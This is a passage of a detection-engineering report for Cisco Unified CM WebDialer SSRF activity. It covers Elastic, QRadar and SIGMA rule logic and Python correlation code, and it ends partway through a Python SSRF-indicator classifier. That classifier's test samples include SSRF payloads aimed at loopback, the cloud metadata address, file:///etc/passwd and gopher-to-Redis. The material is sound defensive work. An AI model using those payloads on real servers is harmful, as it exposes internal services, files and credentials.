Operational confidence is moderate for standalone suspicious WebDialer activity and high when transform-backed WebDialer candidates correlate with rare egress, administrative change, file modification, service restart, route-plan change, call-routing change, abnormal management login, voice-service instability, or confirmed appliance-side compromise indicators.

Operational TCR

8.3 / 10

Full-Telemetry TCR

9.2 / 10

Limitations

This rule depends on transform quality, ECS/local field mapping, URI-preserving WebDialer telemetry, Unified CM asset inventory, stable correlation scope, and local exception-list freshness. Encrypted traffic without HTTP metadata, missing WebDialer logs, incomplete administrative audit telemetry, stale asset inventory, unreliable NAT/backend mapping, or stale transforms may reduce confidence. Legitimate click-to-call workflows, provider support, vulnerability scanning, patch validation, backup operations, certificate management, route-plan changes, service restarts, cluster maintenance, and emergency remediation may produce similar activity and must be tuned before alert-mode deployment.

Detection Query Pattern

Elastic transform-backed KQL and EQL pattern for Cisco Unified CM / Unified CM SME WebDialer SSRF-shaped activity followed by rare egress or voice-control-plane change. Configure Elastic rule data views to include transform-backed WebDialer suspicious activity, rare Unified CM egress, and Unified CM control-plane change candidate data streams. The ENV_CUCM_RARE_EGRESS_WINDOW and ENV_CUCM_CONTROL_PLANE_CHANGE_WINDOW names in the sequences are placeholders: EQL only accepts a literal duration after maxspan (for example maxspan=30m), so substitute the locally tuned window before the rule will parse. Local ECS field, value-list, enrichment-policy, exception-list, transform, threshold, and timing-window validation are required before production deployment.

KQL transform filter for suspicious WebDialer candidates.

labels.is_cucm_asset : true
and labels.webdialer_enabled : true
and labels.cucm_scope : *
and (
labels.webdialer_suspicious : true or
labels.webdialer_event_type : (
"abnormal_webdialer_access" or
"webdialer_request_from_unapproved_source" or
"webdialer_access_outside_click_to_call_workflow" or
"webdialer_backend_fetch_behavior" or
"webdialer_response_anomaly" or
"webdialer_failure_to_success_pattern" or
"suspicious_source_to_voice_management_plane"
) or
labels.ssrf_request_indicator : true or
labels.webdialer_source_risk : true or
labels.webdialer_reputation_risk : true
)
and not labels.is_approved_change : true

KQL transform filter for rare Unified CM egress candidates.

labels.is_cucm_asset : true
and labels.cucm_scope : *
and labels.is_rare_cucm_egress : true
and (
labels.rare_egress_event_type : (
"rare_outbound_connection" or
"unexpected_external_egress" or
"unexpected_dns_resolution" or
"connection_to_unapproved_destination" or
"connection_to_unknown_reputation_destination" or
"connection_to_suspicious_reputation_destination" or
"egress_not_in_voice_platform_baseline"
) or
labels.destination_reputation : (
"unknown" or
"suspicious" or
"malicious"
)
)
and not labels.is_approved_change : true
and not labels.is_approved_egress_destination : true

KQL transform filter for Cisco Unified CM control-plane change candidates.

labels.is_cucm_asset : true
and labels.cucm_scope : *
and labels.is_cucm_control_plane_change : true
and labels.control_event_type : (
"cucm_file_created" or
"cucm_file_modified" or
"cucm_service_restart" or
"cucm_administrative_configuration_change" or
"cucm_route_plan_change" or
"cucm_call_routing_change" or
"new_cucm_administrator_created" or
"cucm_administrator_modified" or
"management_login_from_new_source" or
"unusual_cluster_communication" or
"voice_service_instability" or
"unexpected_shell_activity"
)
and not labels.is_approved_change : true
and not labels.is_approved_change_type : true

EQL sequence for suspicious WebDialer activity followed by rare Unified CM egress.

sequence by labels.cucm_scope with maxspan=ENV_CUCM_RARE_EGRESS_WINDOW
[any where labels.is_cucm_asset == true and labels.webdialer_enabled == true and labels.cucm_scope != null and (
labels.webdialer_suspicious == true or
labels.webdialer_event_type in ("abnormal_webdialer_access", "webdialer_request_from_unapproved_source", "webdialer_access_outside_click_to_call_workflow", "webdialer_backend_fetch_behavior", "webdialer_response_anomaly", "webdialer_failure_to_success_pattern", "suspicious_source_to_voice_management_plane") or
labels.ssrf_request_indicator == true or
labels.webdialer_source_risk == true or
labels.webdialer_reputation_risk == true
) and labels.is_approved_change != true]
[any where labels.is_cucm_asset == true and labels.cucm_scope != null and labels.is_rare_cucm_egress == true and labels.is_approved_egress_destination != true and labels.is_approved_change != true]

EQL sequence for suspicious WebDialer activity followed by Cisco Unified CM control-plane change.

sequence by labels.cucm_scope with maxspan=ENV_CUCM_CONTROL_PLANE_CHANGE_WINDOW
[any where labels.is_cucm_asset == true and labels.webdialer_enabled == true and labels.cucm_scope != null and (
labels.webdialer_suspicious == true or
labels.webdialer_event_type in ("abnormal_webdialer_access", "webdialer_request_from_unapproved_source", "webdialer_access_outside_click_to_call_workflow", "webdialer_backend_fetch_behavior", "webdialer_response_anomaly", "webdialer_failure_to_success_pattern", "suspicious_source_to_voice_management_plane") or
labels.ssrf_request_indicator == true or
labels.webdialer_source_risk == true or
labels.webdialer_reputation_risk == true
) and labels.is_approved_change != true]
[any where labels.is_cucm_asset == true and labels.cucm_scope != null and labels.is_cucm_control_plane_change == true and labels.is_approved_change != true and labels.is_approved_change_type != true]
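
The two sequences above are easiest to reason about when run by hand over a handful of candidate events. The Python below is an added illustration, not code from this report, from Elastic, or from Cisco: it emulates `sequence by labels.cucm_scope with maxspan=...` for both sequences, applies the same approved-change exclusions, and folds the result into one offense per stage-1 event using the medium / high / critical tiers the report assigns. Event keys mirror the labels.* names with the prefix dropped, "ts" stands in for @timestamp, the 30-minute and 60-minute windows are assumed local tuning values, and every sample event is constructed for the demonstration.

```python
from datetime import datetime, timedelta

# labels.webdialer_event_type values accepted by stage 1 of both sequences.
WEBDIALER_EVENT_TYPES = {
    "abnormal_webdialer_access", "webdialer_request_from_unapproved_source",
    "webdialer_access_outside_click_to_call_workflow", "webdialer_backend_fetch_behavior",
    "webdialer_response_anomaly", "webdialer_failure_to_success_pattern",
    "suspicious_source_to_voice_management_plane",
}


def stage_webdialer(ev: dict) -> bool:
    """Stage 1: suspicious WebDialer activity on a WebDialer-enabled Unified CM
    asset with a scope, excluding anything tagged as an approved change."""
    if not (ev.get("is_cucm_asset") and ev.get("webdialer_enabled") and ev.get("cucm_scope")):
        return False
    if ev.get("is_approved_change"):
        return False
    return bool(ev.get("webdialer_suspicious")
                or ev.get("webdialer_event_type") in WEBDIALER_EVENT_TYPES
                or ev.get("ssrf_request_indicator")
                or ev.get("webdialer_source_risk")
                or ev.get("webdialer_reputation_risk"))


def stage_rare_egress(ev: dict) -> bool:
    """Stage 2 of the first sequence (rare, unapproved egress)."""
    return bool(ev.get("is_cucm_asset") and ev.get("cucm_scope") and ev.get("is_rare_cucm_egress")
                and not ev.get("is_approved_egress_destination") and not ev.get("is_approved_change"))


def stage_control_plane(ev: dict) -> bool:
    """Stage 2 of the second sequence (unapproved control-plane change)."""
    return bool(ev.get("is_cucm_asset") and ev.get("cucm_scope") and ev.get("is_cucm_control_plane_change")
                and not ev.get("is_approved_change") and not ev.get("is_approved_change_type"))


def correlate(events, egress_window: timedelta, change_window: timedelta):
    """Emulate `sequence by cucm_scope with maxspan=...` for both sequences and fold
    the hits into one offense per stage-1 event, using the report's tiers:
    medium (stage 1 alone), high (egress or change), critical (both).
    A later event joins only if it carries the same cucm_scope; being close in
    time to an unrelated cluster's activity never correlates."""
    ordered = sorted(events, key=lambda e: e["ts"])
    widest = max(egress_window, change_window)
    offenses = []
    for i, trig in enumerate(ordered):
        if not stage_webdialer(trig):
            continue
        egress = change = None
        for later in ordered[i + 1:]:
            delta = later["ts"] - trig["ts"]
            if delta > widest:
                break                                   # sorted input: nothing further can match
            if later.get("cucm_scope") != trig["cucm_scope"]:
                continue
            if egress is None and delta <= egress_window and stage_rare_egress(later):
                egress = later
            if change is None and delta <= change_window and stage_control_plane(later):
                change = later
        severity = "critical" if egress and change else "high" if egress or change else "medium"
        offenses.append({"scope": trig["cucm_scope"], "trigger": trig["ts"].isoformat(),
                         "rare_egress": egress is not None,
                         "control_plane_change": change is not None, "severity": severity})
    return offenses


def _t(hhmm: str) -> datetime:
    return datetime.fromisoformat(f"2026-06-24T{hhmm}:00+00:00")


# Constructed candidate events, not real telemetry. Keys are the labels.* names
# with the prefix dropped; "ts" stands in for @timestamp.
EVENTS = [
    # cluster-a: SSRF-shaped WebDialer hit, approved egress (ignored), rare egress, route-plan change -> critical
    {"ts": _t("10:00"), "cucm_scope": "cluster-a", "is_cucm_asset": True, "webdialer_enabled": True,
     "webdialer_event_type": "webdialer_backend_fetch_behavior", "ssrf_request_indicator": True},
    {"ts": _t("10:02"), "cucm_scope": "cluster-a", "is_cucm_asset": True, "is_rare_cucm_egress": True,
     "is_approved_egress_destination": True},
    {"ts": _t("10:04"), "cucm_scope": "cluster-a", "is_cucm_asset": True, "is_rare_cucm_egress": True,
     "destination_reputation": "unknown"},
    {"ts": _t("10:18"), "cucm_scope": "cluster-a", "is_cucm_asset": True,
     "is_cucm_control_plane_change": True, "control_event_type": "cucm_route_plan_change"},
    # cluster-b: suspicious WebDialer hit, rare egress 90 minutes later -> outside window, stays medium
    {"ts": _t("10:01"), "cucm_scope": "cluster-b", "is_cucm_asset": True, "webdialer_enabled": True,
     "webdialer_source_risk": True},
    {"ts": _t("11:31"), "cucm_scope": "cluster-b", "is_cucm_asset": True, "is_rare_cucm_egress": True},
    # cluster-c: rare egress with no preceding WebDialer trigger -> no offense
    {"ts": _t("10:03"), "cucm_scope": "cluster-c", "is_cucm_asset": True, "is_rare_cucm_egress": True},
    # cluster-d: WebDialer hit tagged as approved patch validation -> excluded at stage 1
    {"ts": _t("10:05"), "cucm_scope": "cluster-d", "is_cucm_asset": True, "webdialer_enabled": True,
     "webdialer_event_type": "abnormal_webdialer_access", "is_approved_change": True},
]


def run_demo():
    # 30-minute egress window and 60-minute control-plane window are assumed local tuning values.
    return correlate(EVENTS, timedelta(minutes=30), timedelta(minutes=60))


if __name__ == "__main__":
    for offense in run_demo():
        print(offense)
```

Running it yields a critical offense for cluster-a and a medium one for cluster-b; cluster-c never produces an offense because there is no stage-1 trigger in its scope, and cluster-d is dropped by the approved-change exclusion. The scope check inside the inner loop is the part that matters when tuning: widen the windows and the cluster-b egress would promote to high, but nothing in cluster-c can ever attach to cluster-a's trigger however the windows are set.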

QRadar

Detection Viability Assessment

Production-ready as a QRadar CRE correlation rule where Cisco Unified CM / Unified CM SME WebDialer activity, Cisco Unified CM asset inventory, WebDialer enablement state, source reputation, approved-source context, rare egress context, administrative audit telemetry, service-state telemetry, file-integrity telemetry, route-plan change telemetry, and voice-control-plane change telemetry can be parsed into DSM fields, custom properties, reference sets, reference maps, and building blocks.

The CRE rule is the production detection authority. Supporting AQL should be used only for hunt, validation, tuning, and offense investigation. Do not rely on broad AQL correlation as the primary production control when QRadar building blocks, reference sets, reference maps, offense rules, and bounded CRE correlation are available.

Rule

Cisco Unified CM WebDialer SSRF Candidate Followed by Rare Egress or Voice-Control-Plane Change

Rule Format

QRadar CRE rule and building-block correlation pattern with bounded supporting AQL hunt logic requiring local log-source validation, DSM validation, custom-property validation, reference-set validation, reference-map validation, offense-rule validation, timing-window tuning, and environment-specific allowlisting before production deployment.

Detection Purpose

Detect suspicious Cisco Unified CM / Unified CM SME WebDialer activity that aligns with SSRF-shaped request behavior and is followed by rare outbound communication, administrative change, service manipulation, file activity, route-plan change, call-routing change, abnormal management access, or voice-control-plane instability tied to the same Cisco Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, administrator, or voice-management scope.

Detection Logic

Trigger when QRadar observes suspicious WebDialer activity against a Cisco Unified CM or Unified CM SME asset with WebDialer enabled, especially when the request includes abnormal WebDialer paths, unapproved source context, SSRF-shaped parameter indicators, backend fetch behavior, abnormal response transitions, failure-to-success patterns, suspicious source reputation, or activity outside approved WebDialer workflows.

Assign medium severity when suspicious WebDialer activity occurs against a Unified CM or Unified CM SME asset outside approved WebDialer workflows, monitoring, provider support, vulnerability scanning, patch validation, or maintenance.

Assign high severity when suspicious WebDialer activity is followed within the local rare-egress correlation window by rare outbound communication from the same Unified CM node, Unified CM SME node, backend host, management interface, NAT egress identity, or voice-management segment.

Assign high severity when suspicious WebDialer activity is followed within the local control-plane correlation window by administrative configuration change, service restart, file creation, file modification, route-plan change, call-routing change, abnormal management login, unusual cluster communication, voice-service instability, or unexpected shell activity tied to the same Unified CM node, cluster, backend host, management subnet, administrative identity, or voice-management scope.

Promote to critical when suspicious WebDialer activity converges with rare egress and control-plane change, or when correlated telemetry confirms appliance-side compromise evidence, unauthorized administrator creation, malicious route-plan change, service manipulation, file-write activity, command execution, voice-control-plane instability, or call-routing integrity impact.

Required Telemetry

QRadar log sources for WAF activity.

QRadar log sources for reverse-proxy activity.

QRadar log sources for load-balancer activity.

QRadar log sources for firewall activity.

QRadar log sources for proxy activity.

QRadar log sources for DNS activity.

QRadar log sources for Cisco Unified CM or Unified CM SME access logs where available.

QRadar log sources for Cisco Unified CM administrative audit logs where available.

QRadar log sources for Cisco Unified CM service-status or service-restart telemetry where available.

QRadar log sources for Cisco Unified CM configuration-change telemetry where available.

QRadar log sources for Cisco Unified CM route-plan change telemetry where available.

QRadar log sources for Cisco Unified CM file-integrity telemetry where available.

Cisco Unified CM appliance reference set.

Cisco Unified CM SME appliance reference set.

Cisco Unified CM cluster and node reference map.

Cisco WebDialer-enabled asset reference set.

Approved WebDialer source reference set.

Approved voice administrator source reference set.

Approved call-management integration reference set.

Approved monitoring source reference set.

Approved scanner source reference set.

Approved provider-managed source reference set.

Approved patch-validation source reference set.

Approved maintenance-window reference set or reference map.

Approved Cisco Unified CM egress destination reference set.

Approved route-plan change reference set or reference map.

Approved service-restart reference set or reference map.

Source reputation enrichment.

Destination reputation enrichment.

Recently seen destination-domain and destination-IP baseline.

QRadar custom properties for Cisco Unified CM scope, Cisco Unified CM node, Cisco Unified CM cluster, voice-management segment, WebDialer event type, SSRF request indicator, rare egress event type, control-plane event type, approved-change context, administrator, service action, file action, route-plan object, and call-routing change.

Engineering Implementation Instructions

Create QRadar building blocks for Cisco Unified CM asset identification, WebDialer-enabled assets, suspicious WebDialer activity, rare Cisco Unified CM egress, Cisco Unified CM control-plane change, approved maintenance context, approved WebDialer workflow context, approved provider-managed access, approved vulnerability scanning, approved patch validation, approved route-plan change, approved service restart, approved egress destination, approved incident response, and suspicious voice-control-plane change context.

Create custom properties for Cisco Unified CM scope, Cisco Unified CM node, Cisco Unified CM SME node, Cisco Unified CM cluster, backend host, management interface, NAT egress identity, voice-management segment, WebDialer endpoint category, WebDialer event type, SSRF request indicator, source reputation, destination reputation, egress event type, administrative action, service action, file action, route-plan object, call-routing change, and control-plane event type.

Normalize Cisco Unified CM correlation identity into a stable custom property such as Cisco Unified CM Scope. This field should resolve to the best available shared scope across Cisco Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, or voice-management segment.

Use reference sets and reference maps for Cisco Unified CM assets, Unified CM SME assets, WebDialer-enabled assets, approved WebDialer sources, approved administrators, approved call-management integrations, approved monitoring systems, approved vulnerability scanners, approved provider-managed sources, approved patch-validation sources, approved maintenance windows, approved egress destinations, approved route-plan changes, approved service restarts, approved backup jobs, approved emergency remediation, and recently seen egress destinations.

Use QRadar CRE correlation as the production detection authority. Use AQL only as bounded supporting hunt and validation logic to confirm candidate event parsing, custom-property extraction, building-block membership, reference-set coverage, reference-map coverage, and offense context.

Avoid broad production AQL logic over high-volume WAF, proxy, firewall, DNS, endpoint, and administrative events. Use DSM parsing, custom properties, building blocks, reference sets, reference maps, offense rules, and bounded CRE time windows.

Validate that the CRE rule correlates by the same Cisco Unified CM scope, related Unified CM asset, related cluster, related management host, NAT egress identity, voice-management segment, or administrator where locally available. Do not correlate unrelated WebDialer activity and unrelated voice-control-plane changes only because they occur within the same time range.

Run in monitor mode before alert mode to baseline approved WebDialer use, click-to-call workflows, monitoring activity, scanner activity, provider-managed access, patch validation, maintenance activity, call-management integrations, directory integration, backup activity, route-plan changes, cluster communication, and expected voice-platform egress.

Treat DSM validation, custom-property extraction, reference-set freshness, reference-map completeness, building-block quality, offense-rule grouping, timing-window tuning, false-positive testing, and SOC triage output fields as required local deployment work.

DRI Assessment

High resilience where WebDialer activity, Cisco Unified CM asset inventory, WebDialer enablement inventory, source reputation, rare egress baselines, administrative audit telemetry, service-state telemetry, file-integrity telemetry, route-plan change telemetry, and voice-control-plane change telemetry are parsed into reliable QRadar custom properties and building blocks. Resilience is lower where WebDialer URI visibility, Unified CM administrative telemetry, DSM parsing quality, or stable Unified CM scope mapping is unavailable.

DRI

8.5 / 10

TCR Assessment

Operational confidence is moderate for standalone suspicious WebDialer activity and high when QRadar building blocks correlate WebDialer candidates with rare egress, administrative change, file modification, service restart, route-plan change, call-routing change, abnormal management login, voice-service instability, or confirmed appliance-side compromise indicators.

Operational TCR

8.2 / 10

Full-Telemetry TCR

9.1 / 10

Limitations

This rule depends on QRadar DSM quality, custom-property extraction, Cisco Unified CM asset inventory, URI-preserving WebDialer telemetry, stable Cisco Unified CM scope mapping, and local reference-set freshness. Encrypted traffic without HTTP metadata, missing WebDialer logs, incomplete administrative audit telemetry, stale asset inventory, unreliable NAT/backend mapping, or missing custom properties may reduce confidence. Legitimate click-to-call workflows, provider support, vulnerability scanning, patch validation, backup operations, certificate management, route-plan changes, service restarts, cluster maintenance, and emergency remediation may produce similar activity and must be tuned before alert-mode deployment.

Detection Query Pattern

QRadar production CRE logic for Cisco Unified CM / Unified CM SME WebDialer SSRF-shaped activity followed by rare egress or voice-control-plane change, followed by bounded supporting AQL hunt logic. The CRE logic is the production detection authority. The AQL block is supporting hunt and validation logic only and requires local log-source, DSM, custom-property, reference-set, reference-map, building-block, offense-rule, and timing-window validation before operational use. The ENV_* window names in the CRE logic and the LAST ENV_CUCM_CORRELATION_LOOKBACK clause in the AQL are placeholders: AQL expects a literal interval such as LAST 24 HOURS, and the REF: reference-set names must match the sets created locally.

WHEN event matches BB:Cisco Unified CM WebDialer Suspicious Activity
AND event matches BB:Cisco Unified CM Asset With WebDialer Enabled
AND event does NOT match BB:Approved Cisco Unified CM WebDialer Workflow
AND event does NOT match BB:Approved Cisco Unified CM Maintenance Or Provider Support
AND within ENV_CUCM_RARE_EGRESS_WINDOW the same Cisco Unified CM scope, related Cisco Unified CM node, related cluster, related management interface, NAT egress identity, or voice-management segment matches BB:Rare Cisco Unified CM Egress
AND rare egress event does NOT match BB:Approved Cisco Unified CM Egress Destination
AND rare egress event does NOT match BB:Approved Cisco Unified CM Maintenance Or Incident Response
THEN create or contribute to offense Cisco Unified CM WebDialer Activity Followed By Rare Egress.

WHEN event matches BB:Cisco Unified CM WebDialer Suspicious Activity
AND event matches BB:Cisco Unified CM Asset With WebDialer Enabled
AND event does NOT match BB:Approved Cisco Unified CM WebDialer Workflow
AND event does NOT match BB:Approved Cisco Unified CM Maintenance Or Provider Support
AND within ENV_CUCM_CONTROL_PLANE_CHANGE_WINDOW the same Cisco Unified CM scope, related Cisco Unified CM node, related cluster, related management interface, related administrator, or voice-management segment matches BB:Cisco Unified CM Control-Plane Change
AND control-plane event does NOT match BB:Approved Cisco Unified CM Change
AND control-plane event does NOT match BB:Approved Cisco Unified CM Maintenance Or Incident Response
AND control-plane event matches BB:Suspicious Cisco Unified CM Control-Plane Change Context
THEN create or contribute to offense Cisco Unified CM WebDialer Activity Followed By Control-Plane Change.

WHEN offense contains BB:Cisco Unified CM WebDialer Suspicious Activity
AND offense contains BB:Rare Cisco Unified CM Egress
AND offense contains BB:Cisco Unified CM Control-Plane Change
AND offense does NOT contain BB:Approved Cisco Unified CM Maintenance Or Incident Response
THEN increase offense severity and credibility for Cisco Unified CM WebDialer Activity With Rare Egress And Control-Plane Change.

SELECT
DATEFORMAT(starttime, 'YYYY-MM-dd HH:mm:ss') AS event_time,
sourceip,
destinationip,
"Cisco Unified CM Scope" AS cucm_scope,
"Cisco Unified CM Node" AS cucm_node,
"Cisco Unified CM Cluster" AS cucm_cluster,
"Voice Management Segment" AS voice_management_segment,
"WebDialer Event Type" AS webdialer_event_type,
"SSRF Request Indicator" AS ssrf_request_indicator,
"Rare Egress Event Type" AS rare_egress_event_type,
"Control Plane Event Type" AS control_event_type,
"Administrator" AS administrator,
"Service Name" AS service_name,
"Service Action" AS service_action,
"File Path" AS file_path,
"File Action" AS file_action,
"Route Plan Object" AS route_plan_object,
"Call Routing Change" AS call_routing_change,
"Change Context" AS change_context,
QIDNAME(qid) AS event_name,
LOGSOURCENAME(logsourceid) AS log_source
FROM events
WHERE
"Cisco Unified CM Scope" IS NOT NULL
AND (
"Cisco Unified CM WebDialer Suspicious Activity" = 'true'
OR "Rare Cisco Unified CM Egress" = 'true'
OR "Cisco Unified CM Control Plane Change" = 'true'
)
AND NOT (
"Change Context" ILIKE '%approved%'
OR REFERENCESETCONTAINS('REF:Approved Cisco Unified CM WebDialer Sources', sourceip)
OR REFERENCESETCONTAINS('REF:Approved Cisco Unified CM Provider Sources', sourceip)
OR REFERENCESETCONTAINS('REF:Approved Cisco Unified CM Scanner Sources', sourceip)
OR REFERENCESETCONTAINS('REF:Approved Cisco Unified CM Egress Destinations', destinationip)
OR REFERENCESETCONTAINS('REF:Approved Cisco Unified CM Maintenance Sources', sourceip)
)
LAST ENV_CUCM_CORRELATION_LOOKBACK

SIGMA

Detection Viability Assessment

Production-ready as SIGMA event-rule templates for Cisco Unified CM / Unified CM SME WebDialer suspicious activity, rare Unified CM egress, and Unified CM control-plane change indicators where the customer has normalized WAF, reverse-proxy, load-balancer, firewall, proxy, DNS, Cisco Unified CM access logs, administrative audit logs, service-state logs, file-integrity logs, or route-plan change logs into backend fields that can be mapped during SIEM conversion.

SIGMA should not be used to claim native cross-event temporal correlation by itself. Use these rules as backend-convertible event detection templates. The customer’s SIEM, data lake, or detection platform must perform the final correlation between WebDialer suspicious activity and follow-on rare egress or control-plane change using local fields, enrichment, timing windows, and suppression logic.

Rule

Cisco Unified CM WebDialer SSRF Candidate and Follow-On Voice-Control-Plane Activity SIGMA Templates

Rule Format

SIGMA event-rule template set requiring backend conversion, local field mapping, enrichment-field creation, asset-scope validation, exception-list validation, and SIEM-native correlation before production deployment.

Detection Purpose

Detect Cisco Unified CM / Unified CM SME WebDialer suspicious activity, rare Unified CM egress, and Unified CM control-plane change events that can support backend SIEM correlation for possible WebDialer SSRF exploitation, appliance-side compromise, unauthorized administrative change, service manipulation, route-plan change, call-routing change, or voice-control-plane instability.

Detection Logic

Trigger the WebDialer event rule when HTTP telemetry, WAF telemetry, reverse-proxy telemetry, load-balancer telemetry, or Cisco Unified CM access telemetry identifies WebDialer activity against a Cisco Unified CM or Unified CM SME asset with suspicious source context, abnormal WebDialer path context, SSRF-shaped parameter indicators, backend fetch behavior, abnormal response behavior, or failure-to-success request behavior.

Trigger the rare egress event rule when firewall, proxy, DNS, NDR, or endpoint-adjacent telemetry identifies rare or unapproved outbound communication from a Cisco Unified CM node, Unified CM SME node, backend host, NAT egress identity, management interface, or voice-management segment.

Trigger the control-plane change event rule when Cisco Unified CM administrative audit telemetry, service-state telemetry, file-integrity telemetry, route-plan telemetry, call-routing telemetry, endpoint-adjacent telemetry, or management-plane telemetry identifies suspicious administrative change, service restart, file modification, route-plan change, call-routing change, abnormal management login, unusual cluster communication, voice-service instability, or unexpected shell activity.

Assign medium severity to standalone suspicious WebDialer activity outside approved workflows.

Assign high severity when converted backend rules correlate suspicious WebDialer activity with rare Unified CM egress or Unified CM control-plane change within the local correlation window.

Promote to critical when backend correlation shows suspicious WebDialer activity converging with rare egress and control-plane change, or when follow-on telemetry confirms appliance-side compromise evidence, unauthorized administrator creation, malicious route-plan change, service manipulation, file-write activity, command execution, voice-control-plane instability, or call-routing integrity impact.

Required Telemetry

WAF logs.

Reverse-proxy logs.

Load-balancer logs.

Firewall logs.

Proxy logs.

DNS logs.

Cisco Unified CM or Unified CM SME access logs where available.

Cisco Unified CM administrative audit logs where available.

Cisco Unified CM service-status or service-restart telemetry where available.

Cisco Unified CM configuration-change telemetry where available.

Cisco Unified CM route-plan change telemetry where available.

Cisco Unified CM file-integrity telemetry where available.

Cisco Unified CM appliance inventory.

Cisco Unified CM SME appliance inventory.

Cisco Unified CM cluster and node inventory.

Cisco WebDialer enablement inventory.

Normalized destination asset field.

Normalized source IP field.

Normalized forwarded source IP field.

Normalized URI path field.

Normalized query string field.

Normalized full URL field.

Normalized HTTP status field.

Normalized user-agent field.

Normalized event category field.

Normalized event action field.

Normalized file path field.

Normalized service name field.

Normalized administrator field.

Normalized route-plan object field.

Normalized Cisco Unified CM scope field.

Approved WebDialer source enrichment.

Approved administrator enrichment.

Approved maintenance-window enrichment.

Approved provider-managed source enrichment.

Approved scanner source enrichment.

Approved egress destination enrichment.

Approved change-context enrichment.

Source reputation enrichment.

Destination reputation enrichment.

Engineering Implementation Instructions

Map SIGMA fields to the customer’s SIEM fields before deployment. Required mapped fields include destination asset, source IP, forwarded source IP, HTTP method, URI path, query string, full URL, HTTP status, user agent, destination IP, destination domain, destination port, administrator, service name, service action, file path, file action, route-plan object, call-routing change, event category, event action, and Cisco Unified CM scope.

Create local enrichment fields for Cisco Unified CM asset status, Unified CM SME asset status, WebDialer enablement, approved WebDialer source, approved administrator source, approved provider-managed source, approved scanner source, approved monitoring source, approved patch-validation source, approved maintenance context, approved egress destination, approved route-plan change, approved service restart, source reputation, destination reputation, rare destination, and Cisco Unified CM scope. The WebDialer template's exclusion filters read three of these as labels.is_approved_change, labels.is_approved_webdialer_workflow, and labels.is_approved_maintenance_or_incident_response; either populate fields with those names or rename the filter selections during conversion.

Use the SIGMA WebDialer rule to generate upstream suspicious activity candidates. Use the SIGMA rare egress rule and SIGMA control-plane change rule to generate follow-on candidates. Perform the time-bound correlation in the backend SIEM, not in SIGMA syntax.

Do not deploy these templates as raw one-to-one production alerts without local enrichment and suppression. Standalone matches may indicate vulnerability scanning, approved click-to-call workflows, provider support, monitoring, backup activity, patch validation, emergency remediation, or normal Cisco Unified CM administration.

Validate backend conversion for Splunk, Elastic, QRadar, Microsoft Sentinel, Chronicle, or the customer’s target detection platform before promotion. Confirm that field names, list operators, wildcard handling, case sensitivity, event categories, nested fields, and exception semantics survive conversion.

Validate that backend correlation uses a stable Cisco Unified CM scope across Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, or voice-management segment. Do not correlate unrelated WebDialer events and unrelated administrative changes only because they occur in the same time range.

Run the converted rules in hunt mode before alert mode to baseline approved WebDialer use, click-to-call workflows, monitoring activity, vulnerability scanning, provider-managed access, patch validation, certificate management, route-plan changes, service restarts, cluster maintenance, backup activity, and expected voice-platform egress.

Treat field mapping, enrichment creation, backend conversion validation, exception-list quality, time-window tuning, false-positive testing, and backend correlation readiness as required local deployment work.
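
The SSRF-indicator enrichment asked for above (and the labels.ssrf_request_indicator transform label in the Elastic section) has to be computed before any string match runs, because a percent-encoded substring list only catches the exact encodings it lists: a double-encoded scheme, a decimal-form loopback address, or a bracketed IPv6 loopback all pass such a list untouched. The following Python is an added example, not code from this report, from Cisco, or from the Sigma project. It fully percent-decodes each query parameter, extracts the target host, and classifies it with the standard ipaddress module so the resulting flag and reasons can be written into the enrichment fields. The parameter name target in the samples is a placeholder rather than a documented WebDialer parameter, and all sample query strings are constructed.

```python
import ipaddress
from urllib.parse import parse_qsl, unquote, urlsplit

# Schemes with no place in a click-to-call request; the classic SSRF pivots
# (file, gopher, dict) plus a few others a backend fetcher might honor.
NON_HTTP_SCHEMES = {"file", "gopher", "dict", "ftp", "ldap", "tftp"}


def decode_fully(value: str, max_rounds: int = 4) -> str:
    """Percent-decode until the string stops changing (bounded), so a double-encoded
    %2568%2574%2574%2570 collapses through %68%74%74%70 to plain http."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def host_reasons(host: str, allow_numeric: bool) -> set:
    """Classify a host as loopback, link-local (cloud metadata range), unspecified
    or private. With allow_numeric, integer forms such as 2130706433 or 0x7f000001
    are accepted too, since most HTTP clients resolve them to 127.0.0.1."""
    host = host.strip("[]")
    if not host:
        return set()
    if host.lower() == "localhost" or host.lower().endswith(".localhost"):
        return {"loopback"}
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        if not allow_numeric:
            return set()
        try:
            addr = ipaddress.ip_address(int(host, 0))
        except ValueError:
            return set()
    if addr.is_loopback:
        return {"loopback"}
    if addr.is_link_local:
        return {"link_local"}
    if addr.is_unspecified:
        return {"unspecified"}
    if addr.is_private:
        return {"private"}
    return set()


def value_reasons(value: str) -> set:
    """Reasons one fully decoded parameter value looks like an SSRF target."""
    if "://" in value:
        parts, allow_numeric = urlsplit(value), True
    else:
        parts, allow_numeric = urlsplit("//" + value), False   # bare host[:port] forms
    scheme = parts.scheme.lower()
    reasons = {"scheme:" + scheme} if scheme in NON_HTTP_SCHEMES else set()
    try:
        host = parts.hostname or ""
    except ValueError:                                         # malformed IPv6 brackets
        host = ""
    reasons |= host_reasons(host, allow_numeric)
    if not reasons and scheme in ("http", "https"):
        reasons.add("absolute_url")   # same idea as the "://" entry in the SIGMA list: lower confidence
    return reasons


def ssrf_request_indicator(query_string: str):
    """Evaluate one raw (still percent-encoded) query string and return
    (flag, sorted reasons): the flag feeds labels.ssrf_request_indicator, the
    reasons belong in a companion triage field."""
    reasons = set()
    for key, raw in parse_qsl(query_string, keep_blank_values=True):
        for reason in value_reasons(decode_fully(raw)):
            reasons.add(f"{key}:{reason}")
    return bool(reasons), sorted(reasons)


# Constructed sample query strings, not real WebDialer traffic. "target" is a
# placeholder parameter name, not a documented WebDialer parameter.
SAMPLES = {
    "encoded_loopback": "target=%68%74%74%70%3a%2f%2f127.0.0.1%2fadmin&user=demo",
    "metadata": "target=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F",
    "double_encoded_private": "target=%2568%2574%2574%2570%253a%252f%252f10.0.0.5%252f",
    "file_scheme": "target=file%3A%2F%2F%2Fetc%2Fpasswd",
    "gopher_to_redis": "target=gopher%3a%2f%2f127.0.0.1%3a6379%2f_PING",
    "decimal_loopback": "target=http%3A%2F%2F2130706433%2F",
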